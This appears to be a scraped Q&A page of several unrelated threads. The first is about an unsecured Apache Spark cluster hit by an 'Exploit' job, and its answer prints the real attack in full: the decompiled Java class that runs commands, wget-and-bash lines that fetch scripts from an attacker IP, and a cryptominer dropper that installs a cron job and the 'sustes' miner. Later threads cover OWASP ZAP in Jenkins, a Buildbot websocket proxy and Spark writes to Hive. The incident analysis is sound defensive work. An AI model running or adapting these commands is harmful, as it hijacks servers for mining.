After a lot search and research, I turn to find help here.
The problem is that once a Spark cluster is built(one master and 4 workers with different IP address), each executor will submit "driver" constantly. From web UI, I can see a class named "Exploit" submitted with the "driver". web UI
Following is head and tail of log file of one worker.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found there is a "Exploit" code which hacks Spark cluster by taking advantage of the fact that anyone can submit applications to an unauthorized Spark cluster.
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster is hacked. Cause after applying authorized mode, this problem still exists.
My question is anyone else have this problem? And why would this happen?
THIS IS VERY ALARMING!
Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, this wget to download the script to temp, then execute it.
The downloaded script downloads a jpg and piped to bash. THIS IS NOT AN IMAGE
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg contains a cron job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
public Exploit() {
}
public static void main(String[] var0) throws Exception {
String[] var1 = var0[0].split(",");
String[] var2 = var1;
int var3 = var1.length;
for(int var4 = 0; var4 < var3; ++var4) {
String var5 = var2[var4];
System.out.println(var5);
System.out.println(executeCommand(var5.trim()));
System.out.println("==============================================");
}
}
private static String executeCommand(String var0) {
StringBuilder var1 = new StringBuilder();
try {
Process var2 = Runtime.getRuntime().exec(var0);
var2.waitFor();
BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));
String var4;
while((var4 = var3.readLine()) != null) {
var1.append(var4).append("\n");
}
} catch (Exception var5) {
var5.printStackTrace();
}
return var1.toString();
}
}
Related
I have created one pipeline to use OWASP ZAP,
pipeline {
agent any
stages {
stage('Execute Zap Jar') {
steps {
sh '''
java -jar /home/pl/tools/com.cloudbees.jenkins.plugins.customtools.CustomTool/OwaspZap/ZAP_2.12.0/zap-2.12.0.jar -dir "/home/pl/.ZAP" -host 0.0.0.0 -port 8090 -daemon -config api.disablekey=true
'''
}
}
stage('Execute Zap CLI') {
steps {
sh '''
export ZAP_URL=http://localhost && export ZAP_PORT=8090 && zap-cli status
'''
}
}
stage('Execute Zap Session and Zap Scan') {
steps {
sh '''
zap-cli session new && zap-cli spider https://portail-re7-test.XXXXXX.com/ && zap-cli ajax-spider https://portail-re7-test.XXXXXX.com/ && zap-cli active-scan https://portail-re7-test.XXXXXX.com/ && zap session save default
'''
}
}
stage('Extract Zap Report') {
steps {
sh '''
zap-cli report -o report-default.html -f html
'''
}
}
}
}
But it is getting stuck at
7127 [ZAP-daemon] INFO org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on 0.0.0.0:8090
can someone please help me what I am doing wrong
Regrads,
SAM
It looks like ZAP is acting as expected - its been started and is listenning on port 8090.
It has been started in daemon mode and so will stay running until you stop it.
FYI this is not one of the recommended ways to run ZAP - these are listed on https://www.zaproxy.org/docs/automate/
I'd recommend using the Automation Framework :)
I have installed buildbot -- one docker image with a master, and another with a worker. Inter-container networking is allowed, and they share the same network; I have also a gitea instance, and installed the buildbot_gitea plugin.
So far I got a small project to run make on the worker after a push, and buildbot correctly reports success back to gitea (I can tell form the logs, and gitea also shows the green check image on the repo).
However,
the waterfall view is always empty; console and grid views do not load (they show the "loading" animation and never finish);
in the "Home" buildbot tab, sometimes the list of recent builds show up, sometimes it doesn't. (But the number of recent builds is always correct)
if I click on one of the builds (successful or not, doesn't matter), it shows a build page, but empty (no build steps, no build properties, nothing).
The only things that look strange on the master logs are periodic timeout messages, some connection drop messages:
2020-03-21 12:11:26+0000 [-] Timing out client: IPv4Address(type='TCP', host='172.27.0.1', port=56388)
2020-03-21 12:11:26+0000 [-] Timing out client: IPv4Address(type='TCP', host='172.27.0.1', port=56380)
2020-03-21 12:11:26+0000 [-] Timing out client: IPv4Address(type='TCP', host='172.27.0.1', port=56392)
2020-03-21 12:19:40+0000 [-] dropping connection to peer tcp4:172.27.0.1:56598 with abort=False: None
and this:
2020-03-21 12:10:49+0000 [-] Unhandled error in Deferred:
2020-03-21 12:10:49+0000 [-] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
self.run()
File "/usr/lib/python3.8/threading.py", line 870, in run
self._target(*self._args, **self._kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/_threads/_threadworker.py", line 46, in work
task()
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/_threads/_team.py", line 190, in doWork
task()
--- <exception caught here> ---
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/threadpool.py", line 250, in inContext
result = inContext.theWork()
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/threadpool.py", line 266, in <lambda>
inContext.theWork = lambda: context.call(ctx, func, *args, **kw)
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/context.py", line 122, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/context.py", line 85, in callWithContext
return func(*args,**kw)
File "/bbot/sandbox/lib/python3.8/site-packages/buildbot/buildbot_net_usage_data.py", line 204, in _sendBuildbotNetUsageData
res = _sendWithRequests(PHONE_HOME_URL, data)
File "/bbot/sandbox/lib/python3.8/site-packages/buildbot/buildbot_net_usage_data.py", line 197, in _sendWithRequests
r = requests.post(url, json=data)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/sessions.py", line 530, in request
resp = self.send(prep, **send_kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/sessions.py", line 643, in send
r = adapter.send(request, **kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/adapters.py", line 516, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='events.buildbot.net', port=443): Max retries exceeded with url: /events/phone_home (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7ff7297704f0>: Failed to establish a new connection: [Errno 110] Operation timed out'))
which seems to happen only once (why is buildbot trying to phone home anyway? there is no mention of events.buildbot.net in any of my config files.
The docker containers have full network access, ipv6, routing and DNS are all fine (tested with the buildbot-master image).
This is my master.cfg:
import os
from twisted.application import service
from buildbot.master import BuildMaster
from buildbot.plugins import *
from buildbot_gitea.auth import GiteaAuth
from buildbot_gitea import *
basedir = '/bbot/bbot-master'
rotateLength = 10000000
maxRotatedFiles = 10
configfile = 'master.cfg'
umask = None
if basedir == '.':
basedir = os.path.abspath(os.path.dirname(__file__))
application = service.Application('buildmaster')
from twisted.python.logfile import LogFile
from twisted.python.log import ILogObserver, FileLogObserver
logfile = LogFile.fromFullPath(os.path.join(basedir, "twistd.log"), rotateLength=rotateLength,
maxRotatedFiles=maxRotatedFiles)
application.setComponent(ILogObserver, FileLogObserver(logfile).emit)
m = BuildMaster(basedir, configfile, umask)
m.setServiceParent(application)
m.log_rotation.rotateLength = rotateLength
m.log_rotation.maxRotatedFiles = maxRotatedFiles# -*- python -*-
# ex: set filetype=python:
from buildbot.plugins import *
c = BuildmasterConfig = {}
####### WORKERS
c['workers'] = [worker.Worker("bbot-worker", "BUILDBOT_PASSWORD")]
c['protocols'] = {'pb': {'port': 9989}}
####### CHANGESOURCES
c['change_source'] = []
c['change_source'].append(changes.PBChangeSource())
####### SCHEDULERS
c['schedulers'] = []
c['schedulers'].append(schedulers.SingleBranchScheduler(
name="all",
change_filter=util.ChangeFilter(branch='master'),
treeStableTimer=None,
builderNames=["runtests"]))
c['schedulers'].append(schedulers.ForceScheduler(
name="force",
builderNames=["runtests"]))
####### BUILDERS
factory = util.BuildFactory()
factory.addStep(steps.Gitea(repourl='gitea#gitea.mydomain:myself/repo.git',
mode='incremental',
workdir="build",
branch="master",
progress=True,
logEnviron=False,
))
factory.addStep(steps.ShellCommand(command=["make"]))
c['builders'] = []
c['builders'].append(
util.BuilderConfig(name="runtests",
workernames=["bbot-worker"],
factory=factory))
####### BUILDBOT SERVICES
c['services'] = [
reporters.GiteaStatusPush(
baseURL="https://gitea.mydomain/",
token="GITEA_API_ACCESS_TOKEN",
verbose=True)
]
####### PROJECT IDENTITY
c['title'] = "My Domain!"
c['titleURL'] = "https://buildbot.mydomain"
c['buildbotURL'] = "https://buildbot.mydomain/"
c['www'] = dict(port=8010,
plugins=dict(waterfall_view={}, console_view={}, grid_view={}))
c['www']['authz'] = util.Authz(
allowRules = [
util.AnyEndpointMatcher(role="admins")
],
roleMatchers = [
util.RolesFromUsername(roles=['admins'], usernames=['myself'])
]
)
c['www']['auth'] = GiteaAuth(
endpoint="https://gitea.mydomain/",
client_id="MY_CLIENT_ID_FROM_GITEA",
client_secret='MY_CLIENT_SECRET_FROM_GITEA')
c['www']['change_hook_dialects'] = {
'gitea': {
'secret': 'THE_GITEA_WEBHOOK_SECRET',
'onlyIncludePushCommit': True
}
}
####### DB URL
c['db'] = {
'db_url' : "postgresql://buildbot:MY_SECRET_DB_PASSWORD#172.25.0.2/buildbot",
}
The Dockerfile for the master is
FROM alpine:3.11.3
EXPOSE 9989
RUN apk update
RUN apk add python3 bash busybox-extras w3m gcc python3-dev libffi-dev openssl-dev musl-dev postgresql-dev
RUN mkdir /bbot
COPY entrypoint.sh /root/
RUN chmod a+x /root/entrypoint.sh
RUN mkdir /root/.ssh && chmod og-rwx /root/.ssh/
COPY bbot-gitea bbot-gitea.pub /root/.ssh/
RUN chmod og-w /root/.ssh/bbot-gitea*
RUN cd /bbot && \
python3 -m venv sandbox && \
source sandbox/bin/activate && \
pip3 install 'buildbot[bundle]' && \
pip3 install 'requests[security]' && \
pip3 -v install buildbot_gitea && \
pip3 install treq && \
pip3 install psycopg2
RUN apk del gcc python3-dev libffi-dev openssl-dev musl-dev
RUN ls -la /root
RUN cat /root/entrypoint.sh
ENTRYPOINT [ "/root/entrypoint.sh" ]
and the entrypoint does nothing special -- it is this,
#!/bin/bash
cd /bbot
echo " BBOT MASTER ENTRYPOINT"
source sandbox/bin/activate
buildbot upgrade-master bbot-master
# debug: check everything that was pip-installed:
echo "\n\n=====\n"
pip3 list
echo "=====\n\n"
if [ ! -f bbot-master/buildbot.tac ]; then
buildbot create-master bbot-master
fi
buildbot start bbot-master
tail -f /bbot/bbot-master/twistd.log
and the pip3 list line, which runs on startup for debugging, shows that I have
buildbot 2.7.0
buildbot-console-view 2.7.0
buildbot-gitea 1.2.0
buildbot-grid-view 2.7.0
buildbot-waterfall-view 2.7.0
buildbot-worker 2.7.0
buildbot-www 2.7.0
edit: checked the JS console in Firefox, and there seems to be a problem connecting to the server via websockets:
Firefox can’t establish a connection to the server at wss://buildbot.mydomain/ws.
From Chrome, this is what I see:
WebSocket connection to 'wss://buildbot.aleph0.info/ws' failed: Error during WebSocket handshake: Unexpected response code: 200
(200? why 200?)
I can't see why it wouldn't work. Apache is configured to do reverse proxying, like this:
RewriteEngine On
RewriteCond ${HTTP:Upgrade} websocket [NC]
RewriteCond ${HTTP:Connection} upgrade [NC]
RewriteRule .* "wss:/localhost:8010/$1" [P,L]
ProxyPass / http://localhost:8010/
ProxyPassReverse / http://localhost:8010/
So... What else can I do to continue debugging this?
(By the way, it does look like the buildbot mailing list is not very active -- after posting this question there I checked the archives, and there is svery low activity. Where do users of Buildbot go these days in order to get and share advice?)
I found the problem!
It was the reverse proxy that wasn't properly configured for websockets.
I used this in my apache virtualhost config,
<Location /ws>
ProxyPass ws://127.0.0.1:8010/ws
ProxyPassReverse ws://127.0.0.1:8010/ws
</Location>
ProxyPass /ws !
ProxyPass / http://localhost:8010/
ProxyPassReverse / http://localhost:8010/
and it works now!
( after searching a lot, I found the solution here:
https://docs.buildbot.net/0.9.2/manual/cfg-www.html )
There it is, in case anyone else needs it.
As a datasource I am using a kafka stream to consume tweets.
I have written a simple spark streaming application.
I am able to consume the tweets and I am able convert the records to my own case class.
But I am not able to write to a hive table located in the same docker as spark.
Can you give me a hint of how to solve it.
import com.fhjoanneum.swd18.grp3.bigdata.convert.TweetToTwitterDbRecord
import com.fhjoanneum.swd18.grp3.bigdata.domain.Tweet
import com.typesafe.scalalogging.LazyLogging
import org.apache.spark.sql._
import org.json4s.jackson.JsonMethods.parse
import org.json4s.{DefaultFormats}
case object TwitterInputStream extends App with LazyLogging {
val spark = SparkSession
.builder()
.appName(s"TestApp")
.master("local[*]")
.config("hive.metastore.uris", "thrift://0.0.0.0:9083")
.enableHiveSupport()
.getOrCreate()
spark.sql("set hive.exec.dynamic.partition.mode=nonstrict")
spark.sql("SET hive.exec.parallel=true")
spark.sql("SET hive.exec.parallel.thread.number=16")
val df = spark.readStream
.format("kafka")
.option("kafka.bootstrap.servers", "192.168.1.156:9092")
.option("subscribe", "twitter-status")
.option("startingOffsets", "latest") // From starting
.load()
import spark.implicits._
val testerDF = df.selectExpr("CAST(value AS STRING)").as[String]
val parsedMsgs = testerDF.map(value => {
implicit val formats = DefaultFormats
val tweet = parse(value).extract[Tweet]
tweet
})
// the following part causes my problems:
val query = parsedMsgs.map(TweetToTwitterDbRecord)
.writeStream.foreachBatch((batchDs: Dataset[_], batchId: Long) =>
batchDs.write
.format("parquet")
.mode(SaveMode.Append)
.insertInto("grp3.tweets")
).start().awaitTermination()
// the commented part works:
// parsedMsgs.writeStream
// .format("console")
// .outputMode("append")
// .start()
// .awaitTermination()
}
The table where I wanna write was created by this statement:
CREATE EXTERNAL TABLE `tweets`(
`id` BigInt,
`createdAt` String,
`text` String,
`userId` Int,
`geo` String,
`coordinates` String,
`place` String,
`quoteCount` Int,
`replyCount` Int,
`retweetCount` Int,
`favoriteCount` Int,
`timestampMs` BigInt
)
ROW FORMAT DELIMITED FIELDS TERMINATED BY ','
STORED AS PARQUET LOCATION '/data/bigdata/tweets'
TBLPROPERTIES ("parquet.compression"="SNAPPY");
It does not break. I have to switch my LOGGER to DEBUG to see whats going on.
The following are the last lines of my logger output:
2020-01-28 21:38:53 INFO ParquetWriteSupport:54 - Initialized Parquet WriteSupport with Catalyst schema:
{
"type" : "struct",
"fields" : [ {
"name" : "id",
"type" : "long",
"nullable" : true,
"metadata" : { }
}, {
"name" : "createdat",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "text",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "userid",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "geo",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "coordinates",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "place",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "quotecount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "replycount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "retweetcount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "favoritecount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "timestampms",
"type" : "long",
"nullable" : true,
"metadata" : { }
} ]
}
and corresponding Parquet message type:
message spark_schema {
optional int64 id;
optional binary createdat (UTF8);
optional binary text (UTF8);
required int32 userid;
optional binary geo (UTF8);
optional binary coordinates (UTF8);
optional binary place (UTF8);
required int32 quotecount;
required int32 replycount;
required int32 retweetcount;
required int32 favoritecount;
optional int64 timestampms;
}
2020-01-28 21:38:53 DEBUG DFSClient:1646 - /data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet: masked=rw-r--r--
2020-01-28 21:38:53 DEBUG Client:1026 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas sending #7
2020-01-28 21:38:53 DEBUG Client:1083 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas got value #7
2020-01-28 21:38:53 DEBUG ProtobufRpcEngine:253 - Call: create took 4ms
2020-01-28 21:38:53 DEBUG DFSClient:1802 - computePacketChunkSize: src=/data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet, chunkSize=516, chunksPerPacket=127, packetSize=65532
2020-01-28 21:38:53 DEBUG LeaseRenewer:301 - Lease renewer daemon for [DFSClient_NONMAPREDUCE_469557971_72] with renew id 1 started
2020-01-28 21:38:53 DEBUG ParquetFileWriter:281 - 0: start
2020-01-28 21:38:53 DEBUG MemoryManager:63 - Allocated total memory pool is: 3626971910
2020-01-28 21:38:53 INFO CodecPool:151 - Got brand-new compressor [.snappy]
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG MemoryManager:138 - Adjust block size from 134,217,728 to 134,217,728 for writer: org.apache.parquet.hadoop.InternalParquetRecordWriter#61628754
2020-01-28 21:38:53 DEBUG RecordConsumerLoggingWrapper:69 - <!-- flush -->
2020-01-28 21:38:53 INFO InternalParquetRecordWriter:165 - Flushing mem columnStore to file. allocated memory: 0
2020-01-28 21:38:53 DEBUG ParquetFileWriter:682 - 4: end
2020-01-28 21:38:54 DEBUG ParquetFileWriter:692 - 1209: footer length = 1205
2020-01-28 21:38:54 DEBUG BytesUtils:159 - write le int: 1205 => 181 4 0 0
2020-01-28 21:38:54 DEBUG DFSClient:1869 - DFSClient writeChunk allocating new packet seqno=0, src=/data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet, packetSize=65532, chunksPerPacket=127, bytesCurBlock=0
2020-01-28 21:38:54 DEBUG DFSClient:1815 - Queued packet 0
2020-01-28 21:38:54 DEBUG DFSClient:1815 - Queued packet 1
2020-01-28 21:38:54 DEBUG DFSClient:2133 - Waiting for ack for: 1
2020-01-28 21:38:54 DEBUG DFSClient:585 - Allocating new block
2020-01-28 21:38:54 DEBUG Client:1026 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas sending #8
2020-01-28 21:38:54 DEBUG Client:1083 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas got value #8
2020-01-28 21:38:54 DEBUG ProtobufRpcEngine:253 - Call: addBlock took 6ms
2020-01-28 21:38:54 DEBUG DFSClient:1390 - pipeline = 172.18.1.3:9866
2020-01-28 21:38:54 DEBUG DFSClient:1390 - pipeline = 172.18.1.2:9866
2020-01-28 21:38:54 DEBUG DFSClient:1601 - Connecting to datanode 172.18.1.3:9866
2020-01-28 21:38:54 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:38:54 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
2020-01-28 21:38:57 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:38:57 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
2020-01-28 21:39:00 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:39:00 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
2020-01-28 21:39:03 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:39:03 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
I am really stuck. I would be grateful for any hint.
Thank you.
Andreas
edit
Ok, after some time it breaks with following message:
2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/spark-f5efe1d0-c8d1-4b6b-bb60-352114a9cf2d
2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/temporaryReader-3bdb4248-1e34-460c-b0d0-78c01460ff63
2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/temporary-d59aa3d8-d255-4134-9793-20a892abaf38
2020-01-28 22:20:21 ERROR DFSClient:930 - Failed to close inode 16620
org.apache.hadoop.ipc.RemoteException(java.io.IOException): File /data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128221820_0001_m_000000_1/part-00000-3e620934-eae5-4235-8a7b-2de07b269e8e-c000.snappy.parquet could only be written to 0 of the 1 minReplication nodes. There are 2 datanode(s) running and 2 node(s) are excluded in this operation.
at org.apache.hadoop.hdfs.server.blockmanagement.BlockManager.chooseTarget4NewBlock(BlockManager.java:2135)
at org.apache.hadoop.hdfs.server.namenode.FSDirWriteFileOp.chooseTargetForNewBlock(FSDirWriteFileOp.java:294)
at org.apache.hadoop.hdfs.server.namenode.FSNamesystem.getAdditionalBlock(FSNamesystem.java:2771)
at org.apache.hadoop.hdfs.server.namenode.NameNodeRpcServer.addBlock(NameNodeRpcServer.java:876)
so a docker issue? How can I map my containers to my host?
My starting script:
#!/bin/bash
# Bring the services up
function startServices {
docker start nodemaster node2 node3
sleep 5
echo ">> Starting hdfs ..."
docker exec -u hadoop -it nodemaster start-dfs.sh
sleep 5
echo ">> Starting yarn ..."
docker exec -u hadoop -d nodemaster start-yarn.sh
sleep 5
echo ">> Starting MR-JobHistory Server ..."
docker exec -u hadoop -d nodemaster mr-jobhistory-daemon.sh start historyserver
sleep 5
echo ">> Starting Spark ..."
docker exec -u hadoop -d nodemaster start-master.sh
docker exec -u hadoop -d node2 start-slave.sh nodemaster:7077
docker exec -u hadoop -d node3 start-slave.sh nodemaster:7077
sleep 5
echo ">> Starting Spark History Server ..."
docker exec -u hadoop nodemaster start-history-server.sh
sleep 5
echo ">> Preparing hdfs for hive ..."
docker exec -u hadoop -it nodemaster hdfs dfs -mkdir -p /tmp
docker exec -u hadoop -it nodemaster hdfs dfs -mkdir -p /user/hive/warehouse
docker exec -u hadoop -it nodemaster hdfs dfs -chmod g+w /tmp
docker exec -u hadoop -it nodemaster hdfs dfs -chmod g+w /user/hive/warehouse
sleep 5
echo ">> Starting Hive Metastore ..."
docker exec -u hadoop -d nodemaster hive --service metastore
echo "Hadoop info # nodemaster: http://172.18.1.1:8088/cluster"
